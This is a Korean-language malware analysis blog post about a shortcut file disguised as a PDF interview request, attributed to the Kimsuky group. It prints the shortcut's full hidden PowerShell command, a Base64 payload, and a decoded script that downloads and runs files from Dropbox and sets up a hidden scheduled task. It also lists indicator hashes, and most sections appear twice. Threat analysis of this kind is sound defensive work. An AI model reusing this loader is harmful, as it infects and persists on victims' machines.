북한 김수키(Kimsuky)에서 만든악성코드-KxS 북한 수해 인터뷰 요청서(대문?아카데미 이?열 이사장님).lnk(2025.4.5)
Contents
오늘은 북한 김수키(Kimsuky) 에서 만든 악성코드 KxS 북한 수해 인터뷰 요청서(대문?아카데미 이?열 이사장님).lnk(2025.4.5)에 대해 알아보겠습니다. 일단 해당 부분은 어디까지나 북한 김수키(Kimsuky) 추정 입니다.
해시
파일명:KxS 북한 수해 인터뷰 요청서(대문?아카데미 이?열 이사장님).lnk
사이즈:1 MB
MD5:89bca3a895fc2c0b5e975372675f0049
SHA-1:169aa69557f591296388c6abe81e6ed7e559c6ed
SHA-256:6262c5ef438992966eda78d6d58e631592c4b78d09b6dd35fea3b6cdd46ac8d9
일단 해당 단체가 무엇인지 모르겠지만, 기독교의 사회 참여와 교회와 사회의 대화, 현재 사회의 인간 소외를 극복하는 인간화를 표방된 곳인데 여기에 왜 공격을 했는지 모르겠지만 일단 악성코드를 분석해 보겠습니다.
악성코드 코드
StringData
{
namestring: Type: PDF File
Size: 358 KB
Date modified: 04/20/2024 11:23
relativepath: not present
workingdir: not present
commandlinearguments:
-windowstyle hidden -nop -NoProf(i)le -NonI(n)teractive -ExecutionPolicy Bypass -c "$
ss=\"JGhoaCA9IEpvaW4(t)UGF0aCAoW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKSkgIktCUyDrto
HtlZwg7IiY7ZW0IOyduO2EsOu3sCDsmpTssq3shJ(w)o64yA66y47ZmU7JWE7Lm0642w66+4IOydtOyCvOyXt
CDsnbTsgqzsnqXri5gpLmRvY3giOyB3Z2V0(I)C1VcmkgImh0dHBzOi8vZGwuZ(H)JvcGJveHVzZXJjb250ZW50LmN
vbS9zY2wvZmkvYWlreDZrb3A4MDNsZnY5dWg4MWx0L3Rlc3QuZ(G)9jeD9ybGtleT1kejV5anNoMmk5dnJvOTFzeDY
zZDAxamE0JnN0PWo4Ymltb2NqJmRsPTAiIC1PdXRGaWxlICRoaGg7ICYgJGhoaDsgJHBw(c)CA9IEpvaW4tUGF0aCA
oJGVudjpBcHBEYXRhKSAiT3BlcmFVcGRhdGUucHMxIjsgJHN0ciA9ICckYWFhID0gSm9pbi1QYXRoICg(k)ZW52OkF
wcERhdGEpICJ0ZW1wMDc0ODYzNDg4OS5wczEiOyB3Z2V0IC1VcmkgImh0dHBzOi8vZGwuZHJvcGJveHVzZXJjb250Z
W50LmN(v)bS9zY2wvZmkvaW5kdTZ5dndodnVubm9qY2ZxcDhjL2FwcGxlLWt5LnR4dD9ybGtleT1xdXd6N3g4aThwc
nZzOGw1YW9oM25qNGprJn(N)0PWhtaDIxb2JiJmRsPTAiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0Z
W0gLVBhdGggJGFhYSAtRm9yY2U7JzsgJHN0c(i)B8IE91dC1GaWxlIC1GaWxlUGF0aCAkcHBwIC1FbmNvZGluZyBVV
EY4OyAkYWN0aW9uID0gTmV3LVNjaGVkdWxlZFRhc2tBY3Rpb24g(L)UV4ZWN1dGUgJ1Bvd2VyU2hlbGwuZXhlJyAtQ
XJndW1lbnQgJy1XaW5kb3dTdHlsZSBIaWRkZW4gLW5vcCAgLU5v(b)kludGVyYWN0aXZlIC1Ob1Byb2ZpbGUgLUV4Z
WN1dGlvblBvbGljeSBCeXBhc3MgLUNvbW1hbmQgIiYgeyRhYmMgPSBKb2luLVBhdGg(g)KCRlbnY6QXBwRGF0YSkgX
CJPcGVyYVVwZGF0ZS5wczFcIjsgJiAkYWJjO30iJzsgJHRyaWdnZXIgPSBOZXctU2NoZWR1bGVkVGFza1(R)yaWdnZ
XIgLU9uY2UgLUF0IChHZXQtRGF0ZSkuQWRkTWludXRlcyg1KSAtUmVwZXRpdGlvbkludGVydmFsIChOZXctVGltZVN
wYW4gL(U)1pbnV0ZXMgMzApOyAkc2V0dGluZ3MgPSBOZXctU2NoZWR1bGVkVGFza1NldHRpbmdzU2V0IC1IaWRkZW4
7IFJlZ2lzdGVyLVNjaGVk(d)WxlZFRhc2sgLVRhc2tOYW1lICJPcGVyYVVwZGF0ZSAyMi0xNTQ1NDM0Mi03LjI4IiA
tQWN0aW9uICRhY3Rpb24gLVRyaWdnZXIgJHR(y)aWdnZXIgLVNldHRpbmdzICRzZXR0aW5nczsgICRhYWEgPSBKb2luLVBhdGggKCRlbnY6QXBwRGF0YSkgImJvYXJkX2ZpcnN0LnBzM(S)I7IHdnZXQgLVVyaSAiaHR0cHM6Ly9kbC5kcm9wYm94dXNlcmNvbnRlbnQuY29tL3NjbC9maS80cTFtc3pqdmwzeXF5NHI1MHA4Yzcv(Y)XBwbGUtbHVjLnR4dD9ybGtleT1qd3o2dWFqbW1qZTJ5d3c3a2Y4ZmVvM2R6JnN0PWF3ODlheTN0JmRsPTA(i)IC1PdXRGaWxlICRhYWE(7)ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAtRm9yY2U7DQoNCg==\"; $aa = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($ss));$cc = $env:appdata;$dd = \"user(.)ps1\";$ee = Join-Path $cc $dd;$aa | Out-File -FilePath $ee; $aaaaa= 89897878; & $ee; Remove-Item -Path $ee -Force;"
iconlocation: %ProgramFiles%\\Windows NT\\Accessories\\wordpad(.)exe
코드 분석
일단 기본적으로 PDF로 위장돼 있고 Base64 인코딩이 돼 있는 것을 확인할 수가 있습니다.
일단 해당 정확한 구조를 파악하기 위해서 Base64 인코딩된 것을 CyberChef 로 풀어주면 됩니다.
그러면 다음과 같은 결과 값을 확인을 할 수가 있을 것입니다.
$hhh = Join-Path ([System.IO.Path]::GetTempPath()) "KxS 북한 수해 인터뷰 요청서(대문x아카데미 이x열 이사장님).docx"; wget -Uri
"hxxps://dl(.)0dropboxusercontent(.0com/scl/fi/aikx6kop803lfv9uh81lt/test(.)docx?r
lkey=dz5yjsh2i9vro91sx63d01(j)a4&st=j8bimocj&dl=0" -OutFile …
해시
파일명:KxS 북한 수해 인터뷰 요청서(대문?아카데미 이?열 이사장님).lnk
사이즈:1 MB
MD5:89bca3a895fc2c0b5e975372675f0049
SHA-1:169aa69557f591296388c6abe81e6ed7e559c6ed
SHA-256:6262c5ef438992966eda78d6d58e631592c4b78d09b6dd35fea3b6cdd46ac8d9
일단 해당 단체가 무엇인지 모르겠지만, 기독교의 사회 참여와 교회와 사회의 대화, 현재 사회의 인간 소외를 극복하는 인간화를 표방된 곳인데 여기에 왜 공격을 했는지 모르겠지만 일단 악성코드를 분석해 보겠습니다.
악성코드 코드
StringData
{
namestring: Type: PDF File
Size: 358 KB
Date modified: 04/20/2024 11:23
relativepath: not present
workingdir: not present
commandlinearguments:
-windowstyle hidden -nop -NoProf(i)le -NonI(n)teractive -ExecutionPolicy Bypass -c "$
ss=\"JGhoaCA9IEpvaW4(t)UGF0aCAoW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKSkgIktCUyDrto
HtlZwg7IiY7ZW0IOyduO2EsOu3sCDsmpTssq3shJ(w)o64yA66y47ZmU7JWE7Lm0642w66+4IOydtOyCvOyXt
CDsnbTsgqzsnqXri5gpLmRvY3giOyB3Z2V0(I)C1VcmkgImh0dHBzOi8vZGwuZ(H)JvcGJveHVzZXJjb250ZW50LmN
vbS9zY2wvZmkvYWlreDZrb3A4MDNsZnY5dWg4MWx0L3Rlc3QuZ(G)9jeD9ybGtleT1kejV5anNoMmk5dnJvOTFzeDY
zZDAxamE0JnN0PWo4Ymltb2NqJmRsPTAiIC1PdXRGaWxlICRoaGg7ICYgJGhoaDsgJHBw(c)CA9IEpvaW4tUGF0aCA
oJGVudjpBcHBEYXRhKSAiT3BlcmFVcGRhdGUucHMxIjsgJHN0ciA9ICckYWFhID0gSm9pbi1QYXRoICg(k)ZW52OkF
wcERhdGEpICJ0ZW1wMDc0ODYzNDg4OS5wczEiOyB3Z2V0IC1VcmkgImh0dHBzOi8vZGwuZHJvcGJveHVzZXJjb250Z
W50LmN(v)bS9zY2wvZmkvaW5kdTZ5dndodnVubm9qY2ZxcDhjL2FwcGxlLWt5LnR4dD9ybGtleT1xdXd6N3g4aThwc
nZzOGw1YW9oM25qNGprJn(N)0PWhtaDIxb2JiJmRsPTAiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0Z
W0gLVBhdGggJGFhYSAtRm9yY2U7JzsgJHN0c(i)B8IE91dC1GaWxlIC1GaWxlUGF0aCAkcHBwIC1FbmNvZGluZyBVV
EY4OyAkYWN0aW9uID0gTmV3LVNjaGVkdWxlZFRhc2tBY3Rpb24g(L)UV4ZWN1dGUgJ1Bvd2VyU2hlbGwuZXhlJyAtQ
XJndW1lbnQgJy1XaW5kb3dTdHlsZSBIaWRkZW4gLW5vcCAgLU5v(b)kludGVyYWN0aXZlIC1Ob1Byb2ZpbGUgLUV4Z
WN1dGlvblBvbGljeSBCeXBhc3MgLUNvbW1hbmQgIiYgeyRhYmMgPSBKb2luLVBhdGg(g)KCRlbnY6QXBwRGF0YSkgX
CJPcGVyYVVwZGF0ZS5wczFcIjsgJiAkYWJjO30iJzsgJHRyaWdnZXIgPSBOZXctU2NoZWR1bGVkVGFza1(R)yaWdnZ
XIgLU9uY2UgLUF0IChHZXQtRGF0ZSkuQWRkTWludXRlcyg1KSAtUmVwZXRpdGlvbkludGVydmFsIChOZXctVGltZVN
wYW4gL(U)1pbnV0ZXMgMzApOyAkc2V0dGluZ3MgPSBOZXctU2NoZWR1bGVkVGFza1NldHRpbmdzU2V0IC1IaWRkZW4
7IFJlZ2lzdGVyLVNjaGVk(d)WxlZFRhc2sgLVRhc2tOYW1lICJPcGVyYVVwZGF0ZSAyMi0xNTQ1NDM0Mi03LjI4IiA
tQWN0aW9uICRhY3Rpb24gLVRyaWdnZXIgJHR(y)aWdnZXIgLVNldHRpbmdzICRzZXR0aW5nczsgICRhYWEgPSBKb2luLVBhdGggKCRlbnY6QXBwRGF0YSkgImJvYXJkX2ZpcnN0LnBzM(S)I7IHdnZXQgLVVyaSAiaHR0cHM6Ly9kbC5kcm9wYm94dXNlcmNvbnRlbnQuY29tL3NjbC9maS80cTFtc3pqdmwzeXF5NHI1MHA4Yzcv(Y)XBwbGUtbHVjLnR4dD9ybGtleT1qd3o2dWFqbW1qZTJ5d3c3a2Y4ZmVvM2R6JnN0PWF3ODlheTN0JmRsPTA(i)IC1PdXRGaWxlICRhYWE(7)ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAtRm9yY2U7DQoNCg==\"; $aa = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($ss));$cc = $env:appdata;$dd = \"user(.)ps1\";$ee = Join-Path $cc $dd;$aa | Out-File -FilePath $ee; $aaaaa= 89897878; & $ee; Remove-Item -Path $ee -Force;"
iconlocation: %ProgramFiles%\\Windows NT\\Accessories\\wordpad(.)exe
코드 분석
일단 기본적으로 PDF로 위장돼 있고 Base64 인코딩이 돼 있는 것을 확인할 수가 있습니다.
일단 해당 정확한 구조를 파악하기 위해서 Base64 인코딩된 것을 CyberChef 로 풀어주면 됩니다.
그러면 다음과 같은 결과 값을 확인을 할 수가 있을 것입니다.
$hhh = Join-Path ([System.IO.Path]::GetTempPath()) "KxS 북한 수해 인터뷰 요청서(대문x아카데미 이x열 이사장님).docx"; wget -Uri
"hxxps://dl(.)0dropboxusercontent(.0com/scl/fi/aikx6kop803lfv9uh81lt/test(.)docx?r
lkey=dz5yjsh2i9vro91sx63d01(j)a4&st=j8bimocj&dl=0" -OutFile …
IoC
169aa69557f591296388c6abe81e6ed7e559c6ed
89bca3a895fc2c0b5e975372675f0049
6262c5ef438992966eda78d6d58e631592c4b78d09b6dd35fea3b6cdd46ac8d9
89bca3a895fc2c0b5e975372675f0049
6262c5ef438992966eda78d6d58e631592c4b78d09b6dd35fea3b6cdd46ac8d9